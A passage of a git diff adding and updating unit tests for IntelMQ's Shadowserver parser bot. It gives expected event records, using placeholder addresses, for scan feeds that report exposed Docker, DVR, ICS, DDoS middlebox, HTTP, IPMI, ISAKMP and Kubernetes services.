+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 80,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ddos-middlebox',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.amplification' : 2,
+   'extra.bytes' : 99,
+   'extra.method' : 'SYN+ACK:PSH',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.source_port' : '41200',
+   'feed.name' : 'DDoS Middlebox',
+   'protocol.application' : 'ddos-middlebox',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 80,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ddos-middlebox',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.amplification' : 2,
+   'extra.bytes' : 99,
+   'extra.method' : 'SYN+ACK:PSH',
+   'extra.source_port' : '47492',
+   'feed.name' : 'DDoS Middlebox',
+   'protocol.application' : 'ddos-middlebox',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 80,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_docker.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_docker.py
new file mode 100644
index 000000000..0f3eafe8f
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_docker.py
@@ -0,0 +1,159 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_docker.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible Docker Service',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_docker-test.csv",
+                  }
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'open-docker',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.api_version' : '1.37',
+   'extra.arch' : 'amd64',
+   'extra.build_time' : '2018-05-09T22:18:36.000000000+00:00',
+   'extra.content_type' : 'application/json; charset=UTF-8',
+   'extra.date' : 'Fri, 06 May 2022 14:06:30 GMT',
+   'extra.experimental' : 'false',
+   'extra.git_commit' : 'f150324',
+   'extra.go_version' : 'go1.9.5',
+   'extra.http' : 'HTTP/1.1',
+   'extra.http_code' : 200,
+   'extra.http_reason' : 'OK',
+   'extra.kernel_version' : '3.10.0-514.26.2.el7.x86_64',
+   'extra.min_api_version' : '1.12',
+   'extra.os' : 'linux',
+   'extra.server' : 'Docker/18.05.0-ce (linux)',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'docker',
+   'extra.version' : '18.05.0-ce',
+   'feed.name' : 'Accessible Docker Service',
+   'protocol.application' : 'docker',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 2375,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-docker',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.api_version' : '1.26',
+   'extra.arch' : 'amd64',
+   'extra.build_time' : '2022-03-02T15:25:43.414574467+00:00',
+   'extra.content_type' : 'application/json',
+   'extra.date' : 'Fri, 06 May 2022 14:08:07 GMT',
+   'extra.experimental' : 'false',
+   'extra.git_commit' : '7d71120/1.13.1',
+   'extra.go_version' : 'go1.10.3',
+   'extra.http' : 'HTTP/1.1',
+   'extra.http_code' : 200,
+   'extra.http_reason' : 'OK',
+   'extra.kernel_version' : '3.10.0-693.2.2.el7.x86_64',
+   'extra.min_api_version' : '1.12',
+   'extra.os' : 'linux',
+   'extra.pkg_version' : 'docker-1.13.1-209.git7d71120.el7.centos.x86_64',
+   'extra.server' : 'Docker/1.13.1 (linux)',
+   'extra.tag' : 'docker',
+   'extra.version' : '1.13.1',
+   'feed.name' : 'Accessible Docker Service',
+   'protocol.application' : 'docker',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 2375,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-docker',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.api_version' : '1.37',
+   'extra.arch' : 'amd64',
+   'extra.build_time' : '2018-05-09T22:18:36.000000000+00:00',
+   'extra.content_type' : 'application/json; charset=UTF-8',
+   'extra.date' : 'Fri, 06 May 2022 14:08:06 GMT',
+   'extra.experimental' : 'false',
+   'extra.git_commit' : 'f150324',
+   'extra.go_version' : 'go1.9.5',
+   'extra.http' : 'HTTP/1.1',
+   'extra.http_code' : 200,
+   'extra.http_reason' : 'OK',
+   'extra.kernel_version' : '3.10.0-514.26.2.el7.x86_64',
+   'extra.min_api_version' : '1.12',
+   'extra.os' : 'linux',
+   'extra.server' : 'Docker/18.05.0-ce (linux)',
+   'extra.tag' : 'docker',
+   'extra.version' : '18.05.0-ce',
+   'feed.name' : 'Accessible Docker Service',
+   'protocol.application' : 'docker',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 2375,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_dvr_dhcpdiscover.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_dvr_dhcpdiscover.py
new file mode 100644
index 000000000..a5b77d7eb
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_dvr_dhcpdiscover.py
@@ -0,0 +1,179 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_dvr_dhcpdiscover.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible DVR DHCPDiscover',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_dvr_dhcpdiscover-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-dvr-dhcpdiscover',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.alarm_input_channels' : 0,
+   'extra.alarm_output_channels' : 0,
+   'extra.device_model' : 'HDCVI 1008 - Gerao 2',
+   'extra.device_serial' : 'BFBE29078050F',
+   'extra.device_type' : 'HDCVI',
+   'extra.device_vendor' : 'Intelbras',
+   'extra.device_version' : '3.200.24.0',
+   'extra.http_port' : 9000,
+   'extra.internal_port' : 37777,
+   'extra.ipv4_address' : '192.168.0.1',
+   'extra.ipv4_dhcp_enable' : False,
+   'extra.ipv4_gateway' : '192.168.0.240',
+   'extra.ipv4_subnet_mask' : '255.255.255.0',
+   'extra.ipv6_address' : 'fd09:4ab5:dae9:b078::1',
+   'extra.ipv6_dhcp_enable' : True,
+   'extra.ipv6_gateway' : 'fd09:4ab5:dae9:b078::ff',
+   'extra.ipv6_link_local' : 'fe80::5a10:8cff:fe19:bffb/64',
+   'extra.mac_address' : '58:10:8c:19:bf:fb',
+   'extra.machine_name' : 'HDCVI',
+   'extra.manufacturer' : 'Intelbras',
+   'extra.method' : 'client.notifyDevInfo',
+   'extra.remote_video_input_channels' : 2,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.video_input_channels' : 8,
+   'extra.video_output_channels' : 0,
+   'feed.name' : 'Accessible DVR DHCPDiscover',
+   'protocol.application' : 'dvrdhcpdiscover',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 37810,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-dvr-dhcpdiscover',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.alarm_input_channels' : 0,
+   'extra.alarm_output_channels' : 0,
+   'extra.device_model' : 'MHDX 3116',
+   'extra.device_serial' : 'EKHH46019297F',
+   'extra.device_type' : 'MHDX',
+   'extra.device_vendor' : 'Intelbras',
+   'extra.device_version' : '4.000.00IB002.17',
+   'extra.http_port' : 80,
+   'extra.internal_port' : 37777,
+   'extra.ipv4_address' : '192.168.0.2',
+   'extra.ipv4_dhcp_enable' : False,
+   'extra.ipv4_gateway' : '192.168.0.240',
+   'extra.ipv4_subnet_mask' : '255.255.255.0',
+   'extra.ipv6_address' : 'fd09:4ab5:dae9:b078::2',
+   'extra.ipv6_dhcp_enable' : True,
+   'extra.ipv6_gateway' : 'fd09:4ab5:dae9:b078::ff',
+   'extra.ipv6_link_local' : 'fe80::26fd:dff:fe55:f232/64',
+   'extra.mac_address' : '24:fd:0d:55:f2:32',
+   'extra.machine_name' : 'MHDX',
+   'extra.manufacturer' : 'Intelbras',
+   'extra.method' : 'client.notifyDevInfo',
+   'extra.remote_video_input_channels' : 8,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.video_input_channels' : 16,
+   'extra.video_output_channels' : 0,
+   'feed.name' : 'Accessible DVR DHCPDiscover',
+   'protocol.application' : 'dvrdhcpdiscover',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 37810,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-dvr-dhcpdiscover',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.alarm_input_channels' : 0,
+   'extra.alarm_output_channels' : 0,
+   'extra.device_model' : 'MHDX 5216',
+   'extra.device_serial' : 'GMII3200193FP',
+   'extra.device_type' : 'MHDX',
+   'extra.device_vendor' : 'Intelbras',
+   'extra.device_version' : '4.000.00IB002.17',
+   'extra.http_port' : 80,
+   'extra.internal_port' : 37777,
+   'extra.ipv4_address' : '192.168.0.3',
+   'extra.ipv4_dhcp_enable' : False,
+   'extra.ipv4_gateway' : '192.168.0.240',
+   'extra.ipv4_subnet_mask' : '255.255.255.0',
+   'extra.ipv6_address' : 'fd09:4ab5:dae9:b078::3',
+   'extra.ipv6_dhcp_enable' : True,
+   'extra.ipv6_gateway' : 'fd09:4ab5:dae9:b078::ff',
+   'extra.ipv6_link_local' : 'fe80::da77:8bff:feb4:92d8/64',
+   'extra.mac_address' : 'd8:77:8b:b4:92:d8',
+   'extra.machine_name' : 'MHDX',
+   'extra.manufacturer' : 'Intelbras',
+   'extra.method' : 'client.notifyDevInfo',
+   'extra.remote_video_input_channels' : 0,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.video_input_channels' : 16,
+   'extra.video_output_channels' : 0,
+   'feed.name' : 'Accessible DVR DHCPDiscover',
+   'protocol.application' : 'dvrdhcpdiscover',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 37810,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ftp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ftp.py
index e4fc02703..33daefd75 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ftp.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ftp.py
@@ -54,7 +54,7 @@
             'extra.cert_expiration_date': 'Jan 14 08:04:50 2020 GMT',
             'extra.sha1_fingerprint': 'D9:98:3F:2E:F9:D1:BE:9A:10:1E:DE:51:2C:C1:DF:01:18:0A:20:65',
             'extra.cert_serial_number': '1121DC7421AB7924C3B1D396AEA3707E9E29',
-            'extra.ssl_version': '2',
+            'extra.ssl_version': 2,
             'extra.signature_algorithm': 'sha256WithRSAEncryption',
             'extra.key_algorithm': 'rsaEncryption',
             'extra.subject_organization_name': 'NTT Communications Corporation',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_http.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_http.py
index 918b46ee9..eaed7f880 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_http.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_http.py
@@ -26,9 +26,9 @@
            'feed.name': 'Accessible HTTP',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
-           'classification.identifier': 'accessible-http',
-           'extra.naics': 518111,
-           'extra.sic': 737401,
+           'classification.identifier': 'open-http',
+           'extra.source.naics': 518111,
+           'extra.source.sic': 737401,
            'extra.http': 'HTTP/1.1',
            'extra.http_code': 200,
            'extra.http_reason': 'OK',
@@ -37,7 +37,8 @@
            'extra.transfer_encoding': 'chunked',
            'extra.http_date': '2018-04-19T00:02:28+00:00',
            'extra.tag': 'http',
-					 'protocol.transport': 'tcp',
+           'protocol.application': 'http',
+	   'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
            'source.reverse_dns': 'c-75-74-78-113.hsd1.fl.comcast.net',
@@ -53,9 +54,9 @@
            'feed.name': 'Accessible HTTP',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
-           'classification.identifier': 'accessible-http',
-           'extra.naics': 518210,
-           'extra.sic': 737415,
+           'classification.identifier': 'open-http',
+           'extra.source.naics': 518210,
+           'extra.source.sic': 737415,
            'extra.http': 'HTTP/1.1',
            'extra.http_code': 200,
            'extra.http_reason': 'OK',
@@ -64,6 +65,7 @@
            'extra.http_date': '2018-04-19T02:02:28+00:00',
            'extra.tag': 'http',
            'protocol.transport': 'tcp',
+           'protocol.application': 'http',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
            'source.reverse_dns': 'sto95-3-88-162-174-130.fbx.proxad.net',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_http_vulnerable.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_http_vulnerable.py
index 358b7f1c9..1035d779a 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_http_vulnerable.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_http_vulnerable.py
@@ -24,8 +24,8 @@
                   }
 EVENTS = [{'__type': 'Event',
            'feed.name': 'Vulnerable HTTP',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
+           'classification.taxonomy': 'vulnerable',
+           'classification.type': 'vulnerable-system',
            'classification.identifier': 'accessible-http',
            'extra.http': 'HTTP/1.1',
            'extra.http_code': 401,
@@ -34,6 +34,7 @@
            'extra.connection': 'close',
            'extra.server': 'mini_httpd/1.28 04Feb2018',
            'extra.http_date': '2000-11-25T20:21:50+00:00',
+           'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'extra.tag': 'basic-auth,http',
            'extra.www_authenticate': 'Basic realm="Managed Switch"',
@@ -49,8 +50,8 @@
            'time.source': '2021-08-01T07:00:24+00:00'},
           {'__type': 'Event',
            'feed.name': 'Vulnerable HTTP',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
+           'classification.taxonomy': 'vulnerable',
+           'classification.type': 'vulnerable-system',
            'classification.identifier': 'accessible-http',
            'extra.http': 'HTTP/1.1',
            'extra.http_code': 401,
@@ -62,6 +63,7 @@
            'extra.tag': 'basic-auth,http',
            'extra.www_authenticate': 'Basic realm="streaming_server"',
            'protocol.transport': 'tcp',
+           'protocol.application': 'http',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
            'source.reverse_dns': 'host.invalid',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ics.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ics.py
new file mode 100644
index 000000000..729e79d85
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ics.py
@@ -0,0 +1,125 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_ics.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Acessible ICS',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_ics-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ics',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.device_model' : 'device_model',
+   'extra.device_type' : 'device_type',
+   'extra.device_vendor' : 'Vendor 1',
+   'extra.device_version' : 'device_version',
+   'extra.raw_response' : 'dGVzdDE=',
+   'extra.response_length' : 5,
+   'extra.source.sector' : 'Sector',
+   'feed.name' : 'Acessible ICS',
+   'protocol.application' : 'modbus',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'CITY',
+   'source.geolocation.region' : 'REGION',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 502,
+   'source.reverse_dns' : 'host1.example.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-03-02T00:34:22+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ics',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.device_model' : 'device_model',
+   'extra.device_type' : 'device_type',
+   'extra.device_vendor' : 'Vendor 2',
+   'extra.device_version' : 'device_version',
+   'extra.raw_response' : 'dGVzdDI=',
+   'extra.response_length' : 5,
+   'extra.source.sector' : 'Sector',
+   'feed.name' : 'Acessible ICS',
+   'protocol.application' : 'modbus',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64513,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'CITY',
+   'source.geolocation.region' : 'REGION',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 502,
+   'source.reverse_dns' : 'host2.example.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-03-02T00:34:22+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ics',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.device_model' : 'device_model',
+   'extra.device_type' : 'device_type',
+   'extra.device_vendor' : 'Vendor 3',
+   'extra.device_version' : 'device_version',
+   'extra.raw_response' : 'dGVzdDM=',
+   'extra.response_length' : 5,
+   'extra.source.sector' : 'Sector',
+   'feed.name' : 'Acessible ICS',
+   'protocol.application' : 'modbus',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64514,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'CITY',
+   'source.geolocation.region' : 'REGION',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 502,
+   'source.reverse_dns' : 'host3.example.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-03-02T00:34:22+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ipmi.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ipmi.py
index c5e5eb934..08a9082af 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ipmi.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ipmi.py
@@ -31,13 +31,11 @@
            "extra.ipmi_version": "1.5",
            "extra.md2_auth": False,
            "extra.md5_auth": True,
-           "extra.naics": "0",
            "extra.none_auth": True,
            "extra.nulluser": True,
            "extra.oem_auth": False,
            "extra.passkey_auth": True,
            "extra.permessage_auth": True,
-           "extra.sic": "0",
            "extra.tag": "ipmi",
            "extra.userlevel_auth": True,
            "extra.usernames": False,
@@ -64,13 +62,11 @@
            "extra.ipmi_version": "2.0",
            "extra.md2_auth": False,
            "extra.md5_auth": False,
-           "extra.naics": "0",
            "extra.none_auth": False,
            "extra.nulluser": False,
            "extra.oem_auth": False,
            "extra.passkey_auth": False,
            "extra.permessage_auth": False,
-           "extra.sic": "0",
            "extra.tag": "ipmi",
            "extra.userlevel_auth": True,
            "extra.usernames": True,
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_isakmp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_isakmp.py
index 4fb887c25..3192f508f 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_isakmp.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_isakmp.py
@@ -26,15 +26,15 @@
            "classification.identifier": "open-ike",
            "classification.taxonomy": "vulnerable",
            "classification.type": "vulnerable-system",
-           "extra.domain_of_interpretation": 0,
-           "extra.exchange_type": 5,
-           "extra.flags": 0,
+           "extra.domain_of_interpretation": '00',
+           "extra.exchange_type": '05',
+           "extra.flags": '00',
            "extra.initiator_spi": "3e35c70729dfedef",
            "extra.message_id": "00000000",
            "extra.naics": 517311,
-           "extra.next_payload": 11,
-           "extra.next_payload2": 0,
-           "extra.notify_message_type": 14,
+           "extra.next_payload": '11',
+           "extra.next_payload2": '00',
+           "extra.notify_message_type": '14',
            "extra.responder_spi": "253acab7cbfda607",
            "extra.spi_size": 0,
            "extra.tag": "isakmp-vulnerable",
@@ -57,14 +57,14 @@
            "classification.identifier": "open-ike",
            "classification.taxonomy": "vulnerable",
            "classification.type": "vulnerable-system",
-           "extra.domain_of_interpretation": 0,
-           "extra.exchange_type": 5,
-           "extra.flags": 0,
+           "extra.domain_of_interpretation": '00',
+           "extra.exchange_type": '05',
+           "extra.flags": '00',
            "extra.initiator_spi": "3e35c70729dfedef",
            "extra.message_id": "00000000",
-           "extra.next_payload": 11,
-           "extra.next_payload2": 0,
-           "extra.notify_message_type": 14,
+           "extra.next_payload": '11',
+           "extra.next_payload2": '00',
+           "extra.notify_message_type": '14',
            "extra.responder_spi": "b274460e7adc1bf0",
            "extra.spi_size": 0,
            "extra.tag": "isakmp-vulnerable",
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_kubernetes.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_kubernetes.py
new file mode 100644
index 000000000..e2f1c3bc6
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_kubernetes.py
@@ -0,0 +1,214 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_kubernetes.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible Kubernetes API Server',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
